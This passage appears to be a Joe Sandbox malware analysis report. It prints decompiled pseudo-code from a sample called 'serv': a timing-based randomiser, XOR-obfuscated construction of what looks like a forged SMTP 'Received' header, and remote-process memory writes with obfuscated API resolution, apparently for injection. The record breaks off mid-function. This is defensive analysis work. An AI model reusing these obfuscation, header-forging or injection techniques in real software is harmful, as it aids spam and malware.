                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlenwsprintf
                                                                    • String ID: $$&$5$9$H$J$L$S$v${$|
                                                                    • API String ID: 357247895-4052902452
                                                                    • Opcode ID: 70a3f77b2afdb2d88eb9b90bf654e58b67e356620927cc54231a5591531bb68d
                                                                    • Instruction ID: b443a9002dd2545cfb2a42d135fe251f7983a57c5715210b5e5f200512873159
                                                                    • Opcode Fuzzy Hash: 70a3f77b2afdb2d88eb9b90bf654e58b67e356620927cc54231a5591531bb68d
                                                                    • Instruction Fuzzy Hash: B7913B3150C3858AD314CB2888406EFBBD19BD6318F184B6EF5E5473D2DA78D94AC7AB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E0040D1C0(signed int __edx) {
                                                                    				signed int _v4;
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				signed int _v16;
                                                                    				signed int _t17;
                                                                    				signed int _t19;
                                                                    				signed int _t21;
                                                                    				signed int _t23;
                                                                    				signed int _t33;
                                                                    
                                                                    				_t33 = __edx;
                                                                    				_t17 = GetTickCount();
                                                                    				_v16 = _t17;
                                                                    				asm("rdtsc");
                                                                    				_v16 = _v16 ^ _t17 ^ _t33;
                                                                    				_t19 = GetTickCount();
                                                                    				_v12 = _t19;
                                                                    				asm("rdtsc");
                                                                    				_v12 = _v12 ^ _t19 ^ _t33;
                                                                    				_t21 = GetTickCount();
                                                                    				_v8 = _t21;
                                                                    				asm("rdtsc");
                                                                    				_v8 = _v8 ^ _t21 ^ _t33;
                                                                    				_t23 = GetTickCount();
                                                                    				_v4 = _t23;
                                                                    				asm("rdtsc");
                                                                    				_v4 = _v4 ^ _t23 ^ _t33;
                                                                    				return ((_v16 << 0x00000008 ^ _v12) << 0x00000008 ^ _v8) << 0x00000008 ^ _v4;
                                                                    			}












                                                                    0x0040d1c0
                                                                    0x0040d1ca
                                                                    0x0040d1cc
                                                                    0x0040d1d0
                                                                    0x0040d1d4
                                                                    0x0040d1d8
                                                                    0x0040d1da
                                                                    0x0040d1de
                                                                    0x0040d1e2
                                                                    0x0040d1e6
                                                                    0x0040d1e8
                                                                    0x0040d1ec
                                                                    0x0040d1f0
                                                                    0x0040d1f4
                                                                    0x0040d1f6
                                                                    0x0040d1fa
                                                                    0x0040d1fe
                                                                    0x0040d225

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick
                                                                    • String ID:
                                                                    • API String ID: 536389180-0
                                                                    • Opcode ID: 06cb277c412a19d455a6dc8df96309fc19b2975eaca1ef9b4d28768ee416dad0
                                                                    • Instruction ID: af0f3f55c9e785d9b7fd4798a08843dbdc6e664f666b2fa863c96dbff1e2f0b3
                                                                    • Opcode Fuzzy Hash: 06cb277c412a19d455a6dc8df96309fc19b2975eaca1ef9b4d28768ee416dad0
                                                                    • Instruction Fuzzy Hash: 5CF0A9319283B59F9708EF39C94518BBBE5EBC4250F54CD2EA8A5C3214E378D904DF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E0040BC70(void* __edx, void* __eflags, signed char _a8, signed char _a10, CHAR* _a20) {
                                                                    				char _v244;
                                                                    				char _v260;
                                                                    				void _v367;
                                                                    				void* _v368;
                                                                    				char _v416;
                                                                    				char _v432;
                                                                    				char _v480;
                                                                    				char _v488;
                                                                    				char _v512;
                                                                    				signed int _v532;
                                                                    				char _v534;
                                                                    				char _v535;
                                                                    				char _v536;
                                                                    				char _v537;
                                                                    				char _v538;
                                                                    				char _v539;
                                                                    				char _v540;
                                                                    				char _v541;
                                                                    				char _v542;
                                                                    				char _v543;
                                                                    				char _v544;
                                                                    				char _v545;
                                                                    				char _v546;
                                                                    				char _v547;
                                                                    				char _v548;
                                                                    				char _v549;
                                                                    				char _v550;
                                                                    				char _v551;
                                                                    				char _v552;
                                                                    				char _v553;
                                                                    				char _v554;
                                                                    				char _v555;
                                                                    				char _v556;
                                                                    				char _v557;
                                                                    				char _v558;
                                                                    				char _v559;
                                                                    				char _v560;
                                                                    				char _v561;
                                                                    				char _v562;
                                                                    				char _v563;
                                                                    				char _v564;
                                                                    				char _v565;
                                                                    				char _v566;
                                                                    				char _v567;
                                                                    				char _v568;
                                                                    				char _v569;
                                                                    				char _v570;
                                                                    				char _v571;
                                                                    				char _v572;
                                                                    				char _v573;
                                                                    				char _v574;
                                                                    				char _v575;
                                                                    				char _v576;
                                                                    				char _v577;
                                                                    				char _v578;
                                                                    				char _v579;
                                                                    				char _v580;
                                                                    				char _v581;
                                                                    				char _v582;
                                                                    				char _v583;
                                                                    				char _v584;
                                                                    				char _v585;
                                                                    				char _v586;
                                                                    				char _v587;
                                                                    				char _v588;
                                                                    				char _v589;
                                                                    				char _v590;
                                                                    				char _v591;
                                                                    				char _v592;
                                                                    				char _v593;
                                                                    				char _v594;
                                                                    				char _v595;
                                                                    				char _v596;
                                                                    				char _v597;
                                                                    				char _v598;
                                                                    				char _v599;
                                                                    				char _v600;
                                                                    				char _v601;
                                                                    				char _v602;
                                                                    				char _v603;
                                                                    				char _v604;
                                                                    				char _v605;
                                                                    				char _v606;
                                                                    				char _v607;
                                                                    				char _v608;
                                                                    				char _v609;
                                                                    				char _v610;
                                                                    				char _v611;
                                                                    				char _v612;
                                                                    				char _v613;
                                                                    				char _v614;
                                                                    				char _v615;
                                                                    				char _v616;
                                                                    				char _v617;
                                                                    				char _v618;
                                                                    				char _v619;
                                                                    				char _v620;
                                                                    				char _v621;
                                                                    				char _v622;
                                                                    				char _v623;
                                                                    				char _v624;
                                                                    				char _v625;
                                                                    				char _v626;
                                                                    				char _v627;
                                                                    				char _v628;
                                                                    				char _v629;
                                                                    				char _v630;
                                                                    				char _v631;
                                                                    				char _v632;
                                                                    				char _v633;
                                                                    				char _v634;
                                                                    				char _v635;
                                                                    				char _v636;
                                                                    				char _v637;
                                                                    				char _v638;
                                                                    				char _v639;
                                                                    				char _v640;
                                                                    				void* __ebx;
                                                                    				signed int _t150;
                                                                    				signed char _t151;
                                                                    				signed char _t152;
                                                                    				signed int _t158;
                                                                    				signed int _t168;
                                                                    				char* _t169;
                                                                    				void* _t178;
                                                                    				signed char _t185;
                                                                    				signed int _t201;
                                                                    				signed int _t202;
                                                                    				signed int _t203;
                                                                    				signed int _t204;
                                                                    				void* _t207;
                                                                    
                                                                    				E0040B470( &_v260, 0x104, (E0040D1C0(__edx) & 0x00000001) + 1, 0);
                                                                    				_v368 = 0x2e;
                                                                    				memset( &_v367, 0, 0x1a << 2);
                                                                    				_t207 =  &_v640 + 0x1c;
                                                                    				asm("stosw");
                                                                    				_v640 = 0x7c;
                                                                    				_v639 = 0x4b;
                                                                    				_v638 = 0x4d;
                                                                    				_v637 = 0x4b;
                                                                    				_v636 = 0x47;
                                                                    				_v635 = 0x58;
                                                                    				_v634 = 0x4b;
                                                                    				_v633 = 0x4a;
                                                                    				_v632 = 0x14;
                                                                    				_v631 = 0xe;
                                                                    				_v630 = 6;
                                                                    				_v629 = 0x5f;
                                                                    				_v628 = 0x43;
                                                                    				_v627 = 0x4f;
                                                                    				_v626 = 0x47;
                                                                    				_v625 = 0x42;
                                                                    				_v624 = 0xe;
                                                                    				_v623 = 0xb;
                                                                    				_v622 = 0x4a;
                                                                    				_v621 = 0xe;
                                                                    				_v620 = 0x47;
                                                                    				_v619 = 0x40;
                                                                    				_v618 = 0x58;
                                                                    				_v617 = 0x41;
                                                                    				_v616 = 0x45;
                                                                    				_v615 = 0x4b;
                                                                    				_v614 = 0x4a;
                                                                    				_v613 = 0xe;
                                                                    				_v612 = 0x4c;
                                                                    				_v611 = 0x57;
                                                                    				_v610 = 0xe;
                                                                    				_v609 = 0x5b;
                                                                    				_v608 = 0x47;
                                                                    				_v607 = 0x4a;
                                                                    				_v606 = 0xe;
                                                                    				_v605 = 0x1e;
                                                                    				_v604 = 7;
                                                                    				_v603 = 0x15;
                                                                    				_v602 = 0xe;
                                                                    				_v601 = 0xb;
                                                                    				_v600 = 0x5d;
                                                                    				_v599 = 7;
                                                                    				_v598 = 0x23;
                                                                    				_v597 = 0x24;
                                                                    				_v596 = 0x7c;
                                                                    				_v595 = 0x4b;
                                                                    				_v594 = 0x4d;
                                                                    				_v593 = 0x4b;
                                                                    				_v592 = 0x47;
                                                                    				_v591 = 0x58;
                                                                    				_v590 = 0x4b;
                                                                    				_v589 = 0x4a;
                                                                    				_v588 = 0x14;
                                                                    				_v587 = 0xe;
                                                                    				_v586 = 0x48;
                                                                    				_v585 = 0x5c;
                                                                    				_v584 = 0x41;
                                                                    				_t201 =  *0x447b04; // 0x0
                                                                    				_v576 = 0x59;
                                                                    				_v549 = 0x59;
                                                                    				_v582 = 0xe;
                                                                    				_v574 = 0xe;
                                                                    				_v568 = 0xe;
                                                                    				_v564 = 0xe;
                                                                    				_v557 = 0xe;
                                                                    				_v556 = 0xe;
                                                                    				_v553 = 0xe;
                                                                    				_v550 = 0xe;
                                                                    				_v545 = 0xe;
                                                                    				_v539 = 0xe;
                                                                    				_v567 = 0xb;
                                                                    				_v562 = 0xb;
                                                                    				_v552 = 0xb;
                                                                    				_v538 = 0xb;
                                                                    				_t185 = _v368;
                                                                    				_t150 = _v532 + (_v532 ^ _t201 ^ 0x00000054) * 0x6c;
                                                                    				_v583 = 0x43;
                                                                    				_v581 = 0x5b;
                                                                    				_v580 = 0x40;
                                                                    				_v579 = 0x45;
                                                                    				_v578 = 0x40;
                                                                    				_v577 = 0x41;
                                                                    				_v575 = 0x40;
                                                                    				_v573 = 6;
                                                                    				_v572 = 0x66;
                                                                    				_v571 = 0x6b;
                                                                    				_v570 = 0x62;
                                                                    				_v569 = 0x61;
                                                                    				_v566 = 0x5d;
                                                                    				_v565 = 7;
                                                                    				_v563 = 6;
                                                                    				_v561 = 0x5d;
                                                                    				_v560 = 7;
                                                                    				_v559 = 0x23;
                                                                    				_v558 = 0x24;
                                                                    				_v555 = 0x4c;
                                                                    				_v554 = 0x57;
                                                                    				_v551 = 0x5d;
                                                                    				_v548 = 0x47;
                                                                    				_v547 = 0x5a;
                                                                    				_v546 = 0x46;
                                                                    				_v544 = 0x7d;
                                                                    				_v543 = 0x63;
                                                                    				_v542 = 0x7a;
                                                                    				_v541 = 0x7e;
                                                                    				_v540 = 0x15;
                                                                    				_v537 = 0x5d;
                                                                    				_v536 = 0x23;
                                                                    				_v535 = 0x24;
                                                                    				_v534 = 0x2e;
                                                                    				_t178 = 0;
                                                                    				do {
                                                                    					if(_t150 >= 0x28) {
                                                                    						_t150 = _t150 | 0x0000002f;
                                                                    					} else {
                                                                    						_t150 = _t150 + 0x60;
                                                                    					}
                                                                    					 *(_t207 + _t178 + 0x10) =  *(_t207 + _t178 + 0x10) ^ _t185;
                                                                    					_t178 = _t178 + 1;
                                                                    				} while (_t178 < 0x6b);
                                                                    				_t151 = _a10;
                                                                    				_t203 = _t151 & 0x000000ff;
                                                                    				_t202 = _t151 & 0x000000ff;
                                                                    				_t152 = _a8;
                                                                    				_t168 = _t152 & 0x000000ff;
                                                                    				_t204 = _t152 & 0x000000ff;
                                                                    				wsprintfA( &_v432, "%i.%i.%i.%i", _t204, _t168, _t202, _t203);
                                                                    				wsprintfA( &_v488, "%i.%i.%i.%i", _t204, _t168, _t202, (E0040D1C0( &_v432) + _t203) % 0xff);
                                                                    				_t158 = E0040D1C0( &_v488);
                                                                    				_t169 =  &_v512;
                                                                    				E0040BB60(_t169, _t158 % 0xa + 4, _t158 % 0xa + 4);
                                                                    				_push( &_v244);
                                                                    				_push( &_v416);
                                                                    				_push( &_v480);
                                                                    				_push(_t169);
                                                                    				_push( &_v244);
                                                                    				return wsprintfA(_a20,  &_v624, E0040D1C0(_t169) % 0xbb8 + 0x3e8);
                                                                    			}






































































































































                                                                    0x0040bc93
                                                                    0x0040bc9d
                                                                    0x0040bcb1
                                                                    0x0040bcb1
                                                                    0x0040bcb7
                                                                    0x0040bcbd
                                                                    0x0040bcc2
                                                                    0x0040bcc6
                                                                    0x0040bccb
                                                                    0x0040bccf
                                                                    0x0040bcd3
                                                                    0x0040bcd8
                                                                    0x0040bcdc
                                                                    0x0040bce1
                                                                    0x0040bce6
                                                                    0x0040bcea
                                                                    0x0040bcef
                                                                    0x0040bcf4
                                                                    0x0040bcf9
                                                                    0x0040bcfe
                                                                    0x0040bd02
                                                                    0x0040bd07
                                                                    0x0040bd0b
                                                                    0x0040bd0f
                                                                    0x0040bd14
                                                                    0x0040bd18
                                                                    0x0040bd1c
                                                                    0x0040bd21
                                                                    0x0040bd26
                                                                    0x0040bd2b
                                                                    0x0040bd30
                                                                    0x0040bd34
                                                                    0x0040bd39
                                                                    0x0040bd3d
                                                                    0x0040bd42
                                                                    0x0040bd47
                                                                    0x0040bd4b
                                                                    0x0040bd50
                                                                    0x0040bd54
                                                                    0x0040bd59
                                                                    0x0040bd5d
                                                                    0x0040bd62
                                                                    0x0040bd67
                                                                    0x0040bd6c
                                                                    0x0040bd70
                                                                    0x0040bd74
                                                                    0x0040bd79
                                                                    0x0040bd7e
                                                                    0x0040bd83
                                                                    0x0040bd88
                                                                    0x0040bd8d
                                                                    0x0040bd91
                                                                    0x0040bd96
                                                                    0x0040bd9a
                                                                    0x0040bd9e
                                                                    0x0040bda3
                                                                    0x0040bda7
                                                                    0x0040bdac
                                                                    0x0040bdb1
                                                                    0x0040bdb5
                                                                    0x0040bdba
                                                                    0x0040bdbf
                                                                    0x0040bdc4
                                                                    0x0040bdcc
                                                                    0x0040bdd0
                                                                    0x0040bdd4
                                                                    0x0040bdd8
                                                                    0x0040bddc
                                                                    0x0040bde0
                                                                    0x0040bde4
                                                                    0x0040bde8
                                                                    0x0040bdec
                                                                    0x0040bdf0
                                                                    0x0040bdf4
                                                                    0x0040bdf8
                                                                    0x0040be0a
                                                                    0x0040be0e
                                                                    0x0040be12
                                                                    0x0040be16
                                                                    0x0040be1a
                                                                    0x0040be21
                                                                    0x0040be23
                                                                    0x0040be28
                                                                    0x0040be2d
                                                                    0x0040be32
                                                                    0x0040be37
                                                                    0x0040be3c
                                                                    0x0040be41
                                                                    0x0040be46
                                                                    0x0040be4b
                                                                    0x0040be50
                                                                    0x0040be55
                                                                    0x0040be5a
                                                                    0x0040be5f
                                                                    0x0040be64
                                                                    0x0040be69
                                                                    0x0040be6e
                                                                    0x0040be73
                                                                    0x0040be78
                                                                    0x0040be7d
                                                                    0x0040be82
                                                                    0x0040be87
                                                                    0x0040be8c
                                                                    0x0040be91
                                                                    0x0040be95
                                                                    0x0040be9a
                                                                    0x0040be9f
                                                                    0x0040bea4
                                                                    0x0040bea9
                                                                    0x0040beae
                                                                    0x0040beb3
                                                                    0x0040beb8
                                                                    0x0040bebd
                                                                    0x0040bec2
                                                                    0x0040bec7
                                                                    0x0040becc
                                                                    0x0040bed0
                                                                    0x0040bed3
                                                                    0x0040beda
                                                                    0x0040bed5
                                                                    0x0040bed5
                                                                    0x0040bed5
                                                                    0x0040bedd
                                                                    0x0040bee1
                                                                    0x0040bee2
                                                                    0x0040bee7
                                                                    0x0040beef
                                                                    0x0040bef2
                                                                    0x0040bef5
                                                                    0x0040befd
                                                                    0x0040bf01
                                                                    0x0040bf13
                                                                    0x0040bf3a
                                                                    0x0040bf40
                                                                    0x0040bf4e
                                                                    0x0040bf59
                                                                    0x0040bf68
                                                                    0x0040bf70
                                                                    0x0040bf78
                                                                    0x0040bf7b
                                                                    0x0040bf83
                                                                    0x0040bfb9

                                                                    APIs
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1CA
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1D8
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1E6
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1F4
                                                                    • wsprintfA.USER32 ref: 0040BF13
                                                                    • wsprintfA.USER32 ref: 0040BF3A
                                                                    • wsprintfA.USER32 ref: 0040BFA6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: #$#$#$$$$$$$%i.%i.%i.%i$.$.$@$@$@$@$A$A$A$B$C$C$E$E$F$H$J$J$J$J$J$L$L$M$M$O$W$W$X$X$X$Z$[$[$\$]$]$]$]$]$_$a$b$c$f$k$z$|$|$}$~
                                                                    • API String ID: 551687249-2377315989
                                                                    • Opcode ID: 46b0ca80fb1ecae1a9c4335a50d069f5509393580674fe675eded00014a221f8
                                                                    • Instruction ID: 60b1195e044942e5e22b5742b43f4241b56dd4fd5edbf32c17c1d0141757e0b5
                                                                    • Opcode Fuzzy Hash: 46b0ca80fb1ecae1a9c4335a50d069f5509393580674fe675eded00014a221f8
                                                                    • Instruction Fuzzy Hash: E6A1D66114D7C0DDE322C668848879BBFD15BF7308F08499DF2D85B293C6AA864CC76B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E00426A34() {
                                                                    				intOrPtr _t20;
                                                                    				int _t21;
                                                                    				long _t24;
                                                                    				void* _t31;
                                                                    				void* _t51;
                                                                    				long _t52;
                                                                    				void* _t57;
                                                                    				signed int _t67;
                                                                    				void** _t69;
                                                                    				void* _t70;
                                                                    				void* _t72;
                                                                    				void* _t73;
                                                                    
                                                                    				_t70 = _t72 - 0x8c;
                                                                    				_t73 = _t72 - 0x10c;
                                                                    				_t20 =  *0x446f24; // 0x81a0b55c
                                                                    				_t52 =  *(_t70 + 0x94);
                                                                    				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
                                                                    				_t21 = 0;
                                                                    				while(_t52 !=  *((intOrPtr*)(0x4475e0 + _t21 * 8))) {
                                                                    					_t21 = _t21 + 1;
                                                                    					if(_t21 < 0x13) {
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				_t67 = _t21 << 3;
                                                                    				_t6 = _t67 + 0x4475e0; // 0xb0000000
                                                                    				if(_t52 ==  *_t6) {
                                                                    					_t21 =  *0x4480e8; // 0x0
                                                                    					if(_t21 == 1 || _t21 == 0 &&  *0x446f14 == 1) {
                                                                    						_t17 = _t67 + 0x4475e4; // 0x430ab0
                                                                    						_t69 = _t17;
                                                                    						_t24 = E00422F20( *_t69);
                                                                    						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
                                                                    					} else {
                                                                    						if(_t52 != 0xfc) {
                                                                    							 *((char*)(_t70 + 0x84)) = 0;
                                                                    							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
                                                                    								E00423FB0(_t70 - 0x80, "<program name unknown>");
                                                                    							}
                                                                    							_t63 = _t70 - 0x80;
                                                                    							if(E00422F20(_t70 - 0x80) + 1 > 0x3c) {
                                                                    								E004281C0(E00422F20(_t63) + _t70 - 0x45, "...", 3);
                                                                    								_t73 = _t73 + 0x10;
                                                                    							}
                                                                    							_t31 = E00422F20(_t63);
                                                                    							_t12 = _t67 + 0x4475e4; // 0x430ab0
                                                                    							_t14 = E00422F20( *_t12) + 0x1c; // 0x1c
                                                                    							_pop(_t57);
                                                                    							E00422920(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
                                                                    							_t51 = _t73;
                                                                    							E00423FB0(_t51, "Runtime Error!\n\nProgram: ");
                                                                    							E00423FC0(_t51, _t63);
                                                                    							E00423FC0(_t51, "\n\n");
                                                                    							_t15 = _t67 + 0x4475e4; // 0x430ab0
                                                                    							E00423FC0(_t51,  *_t15);
                                                                    							_push(0x12010);
                                                                    							_push("Microsoft Visual C++ Runtime Library");
                                                                    							_push(_t51);
                                                                    							_t21 = E00429202();
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return E00428381(_t21,  *((intOrPtr*)(_t70 + 0x88)));
                                                                    			}















                                                                    0x00426a35
                                                                    0x00426a3c
                                                                    0x00426a42
                                                                    0x00426a47
                                                                    0x00426a4f
                                                                    0x00426a58
                                                                    0x00426a5a
                                                                    0x00426a63
                                                                    0x00426a67
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426a67
                                                                    0x00426a6b
                                                                    0x00426a6e
                                                                    0x00426a74
                                                                    0x00426a7a
                                                                    0x00426a82
                                                                    0x00426b6f
                                                                    0x00426b6f
                                                                    0x00426b77
                                                                    0x00426b89
                                                                    0x00426a99
                                                                    0x00426a9f
                                                                    0x00426aaf
                                                                    0x00426abd
                                                                    0x00426ac8
                                                                    0x00426ace
                                                                    0x00426acf
                                                                    0x00426adf
                                                                    0x00426afb
                                                                    0x00426b00
                                                                    0x00426b00
                                                                    0x00426b04
                                                                    0x00426b09
                                                                    0x00426b16
                                                                    0x00426b1e
                                                                    0x00426b22
                                                                    0x00426b27
                                                                    0x00426b2f
                                                                    0x00426b36
                                                                    0x00426b41
                                                                    0x00426b46
                                                                    0x00426b4d
                                                                    0x00426b52
                                                                    0x00426b57
                                                                    0x00426b5c
                                                                    0x00426b5d
                                                                    0x00426b62
                                                                    0x00426a9f
                                                                    0x00426a82
                                                                    0x00426baa

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 00426AB5
                                                                    • _strcat.LIBCMT ref: 00426AC8
                                                                    • _strlen.LIBCMT ref: 00426AD5
                                                                    • _strlen.LIBCMT ref: 00426AE4
                                                                    • _strncpy.LIBCMT ref: 00426AFB
                                                                    • _strlen.LIBCMT ref: 00426B04
                                                                    • _strlen.LIBCMT ref: 00426B11
                                                                    • _strcat.LIBCMT ref: 00426B2F
                                                                    • _strlen.LIBCMT ref: 00426B77
                                                                    • GetStdHandle.KERNEL32(000000F4,00430AB0,00000000,?,00000000,00000000,00000000,00000000), ref: 00426B82
                                                                    • WriteFile.KERNEL32(00000000), ref: 00426B89
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                    • API String ID: 3601721357-4022980321
                                                                    • Opcode ID: 603f9fcbfe5cbeba837c69f9aabc8334fdefa1aec9d5d7cb1c0f1f5f101e93d3
                                                                    • Instruction ID: e2188ca0826f045f4db73bccfd4e3ecd74b0df9453972094ebac32c139a34d3a
                                                                    • Opcode Fuzzy Hash: 603f9fcbfe5cbeba837c69f9aabc8334fdefa1aec9d5d7cb1c0f1f5f101e93d3
                                                                    • Instruction Fuzzy Hash: 02314672700224AADB20EB74BD86FAE7778EB49308F610A1FF405D7541DE7CA945872C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E00404920(intOrPtr _a4) {
                                                                    				char _v4;
                                                                    				char _v28;
                                                                    				char _v32;
                                                                    				void* _v52;
                                                                    				void* _v56;
                                                                    				void* _v64;
                                                                    				void* _v65;
                                                                    				void* _v66;
                                                                    				void* _v67;
                                                                    				void* _v68;
                                                                    				void* _v69;
                                                                    				void* _v70;
                                                                    				void* _v71;
                                                                    				void* _v72;
                                                                    				void* _v73;
                                                                    				void* _v74;
                                                                    				void* _v75;
                                                                    				void* _v76;
                                                                    				void* _v77;
                                                                    				void* _v78;
                                                                    				void* _v79;
                                                                    				void* _v80;
                                                                    				void* _v81;
                                                                    				void* _v82;
                                                                    				void* _v83;
                                                                    				void* _v84;
                                                                    				void* _v120;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t40;
                                                                    				void* _t45;
                                                                    				CHAR* _t48;
                                                                    				void* _t59;
                                                                    				void* _t72;
                                                                    
                                                                    				_t72 =  &_v32;
                                                                    				_v32 = 0;
                                                                    				_t53 = E0041B120(0x42a, 0, _a4);
                                                                    				if(_t37 == 0) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t60 =  *((intOrPtr*)(_t72 + 0x34));
                                                                    					_t66 =  *0x43003c( *((intOrPtr*)(_t72 + 0x34)), _t59) + 1;
                                                                    					_t40 = E0041BC70(_t53, 0,  *0x43003c( *((intOrPtr*)(_t72 + 0x34)), _t59) + 1, 0x1000, 4);
                                                                    					 *((intOrPtr*)(_t72 + 0x34)) = _t40;
                                                                    					if(_t40 != 0 && E0041BD10(_t53, _t40, _t60, _t66, 0) != 0) {
                                                                    						 *((char*)(_t72 + 0x38)) = 0x51;
                                                                    						_v32 = 0x1a;
                                                                    						 *((char*)(_t72 + 0x19)) = 0x34;
                                                                    						 *((char*)(_t72 + 0x1a)) = 0x23;
                                                                    						 *((char*)(_t72 + 0x1b)) = 0x3f;
                                                                    						_v28 = 0x34;
                                                                    						 *((char*)(_t72 + 0x1d)) = 0x3d;
                                                                    						 *((char*)(_t72 + 0x1e)) = 0x62;
                                                                    						 *((char*)(_t72 + 0x1f)) = 0x63;
                                                                    						 *((char*)(_t72 + 0x20)) = 0x51;
                                                                    						_t45 = E004046E0(9,  &_v32, _t72 + 0x34);
                                                                    						_v4 = 0x28;
                                                                    						 *((char*)(_t72 + 0x2c)) = 0x28;
                                                                    						 *((char*)(_t72 + 0x20)) = 0x64;
                                                                    						 *((char*)(_t72 + 0x24)) = 0x64;
                                                                    						 *((char*)(_t72 + 0x25)) = 0x47;
                                                                    						 *((char*)(_t72 + 0x26)) = 0x49;
                                                                    						 *((char*)(_t72 + 0x27)) = 0x4c;
                                                                    						 *((char*)(_t72 + 0x29)) = 0x41;
                                                                    						 *((char*)(_t72 + 0x2a)) = 0x4a;
                                                                    						 *((char*)(_t72 + 0x2b)) = 0x5a;
                                                                    						 *((char*)(_t72 + 0x2c)) = 0x49;
                                                                    						 *((char*)(_t72 + 0x2d)) = 0x5a;
                                                                    						 *((char*)(_t72 + 0x2e)) = 0x51;
                                                                    						 *((char*)(_t72 + 0x2f)) = 0x69;
                                                                    						_t48 = E004046E0(0xd, _t72 + 0x24,  &_v4);
                                                                    						if(GetProcAddress(E0041BDC0(_t45), _t48) != 0 && E0041BE50(_t53, 0, 0, _t50, _a4, 0, 0) != 0) {
